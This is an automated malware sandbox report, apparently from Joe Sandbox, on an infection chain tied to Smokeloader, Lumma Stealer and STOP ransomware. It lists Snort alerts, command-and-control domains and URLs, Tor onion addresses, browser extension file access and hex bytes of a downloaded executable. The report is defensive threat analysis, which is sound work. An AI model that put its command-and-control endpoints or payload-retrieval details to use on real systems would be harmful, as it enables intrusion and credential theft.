            Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: 6C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: DB15.exe, 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: nss3.pdb source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dbghelp.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,12_2_0040FB98
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,17_2_0040F730
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,17_2_00410160
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,17_2_0040FB98
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49707 -> 81.94.159.197:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49710 -> 81.94.159.197:80
            Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.6:49714 -> 189.232.22.59:80
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.6:49714 -> 189.232.22.59:80
            Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.6:49717 -> 78.89.158.42:80
            Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 78.89.158.42:80 -> 192.168.2.6:49716
            Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 78.89.158.42:80 -> 192.168.2.6:49717
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49720 -> 81.94.159.197:80
            Source: TrafficSnort IDS: 2050741 ET TROJAN Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop) 192.168.2.6:57745 -> 1.1.1.1:53
            Source: TrafficSnort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49721 -> 104.21.94.2:443
            Source: TrafficSnort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49722 -> 104.21.94.2:443
            Source: TrafficSnort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49724 -> 104.21.94.2:443
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49725 -> 81.94.159.197:80
            Source: TrafficSnort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49726 -> 104.21.94.2:443
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49728 -> 81.94.159.197:80
            Source: TrafficSnort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49729 -> 104.21.94.2:443
            Source: TrafficSnort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49732 -> 104.21.94.2:443
            Source: TrafficSnort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49734 -> 104.21.94.2:443
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49735 -> 81.94.159.197:80
            Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.6:49737 -> 78.89.158.42:80
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.6:49737 -> 78.89.158.42:80
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.156.20 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 81.94.159.197 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 189.232.22.59 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.253.115.138 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.16.114 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 162.159.129.233 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 103.23.232.80 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.207.127 443Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: associationokeo.shop
            Source: Malware configuration extractorURLs: turkeyunlikelyofw.shop
            Source: Malware configuration extractorURLs: pooreveningfuseor.pw
            Source: Malware configuration extractorURLs: edurestunningcrackyow.fun
            Source: Malware configuration extractorURLs: detectordiscusser.shop
            Source: Malware configuration extractorURLs: problemregardybuiwo.fun
            Source: Malware configuration extractorURLs: lighterepisodeheighte.fun
            Source: Malware configuration extractorURLs: lighterepisodeheighte.fun
            Source: Malware configuration extractorURLs: technologyenterdo.shop
            Source: Malware configuration extractorURLs: resergvearyinitiani.shop
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199658817715
            Source: Malware configuration extractorURLs: http://trad-einmyus.com/index.php
            Source: Malware configuration extractorURLs: http://tradein-myus.com/index.php
            Source: Malware configuration extractorURLs: http://trade-inmyus.com/index.php
            Source: Malware configuration extractorURLs: http://sajdfue.com/test1/get.php
            Found Tor onion address
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: 71C9.exe, 0000001D.00000002.3222435019.000000000C538000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
            Source: 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemScripting.SWbemLocatorMicrosoft Windows 10 ProWbemScripting.SWbemLocatorSELECT OSArchitecture FROM Win32_OperatingSystemLOGONSERVER=\\user-PCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64ProgramData=C:\ProgramData
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 0b1c1115494a5c52100110515d52141b57170d14161d12025206141340084056005707170746501e16121203571c1452160c10121450010500175112041a055b0c0b0a070bhttps://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProW. Europe Standard Time2024/03/28 17:51:34 current filenname with args "C:\Users\user\AppData\Local\Temp\71C9.exe"
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C41A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C41A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: .P19152c2014093e313d075d110f3d082e50http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzSELECT Name FROM Win32_VideoControllerS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7current filenname with args "C:\Users\user\AppData\Local\Temp\71C9.exe"
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 16:50:21 GMTContent-Type: application/octet-streamContent-Length: 776192Last-Modified: Thu, 28 Mar 2024 16:50:03 GMTConnection: closeETag: "66059fbb-bd800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a9 eb 64 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 68 75 00 00 00 00 00 27 3f 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 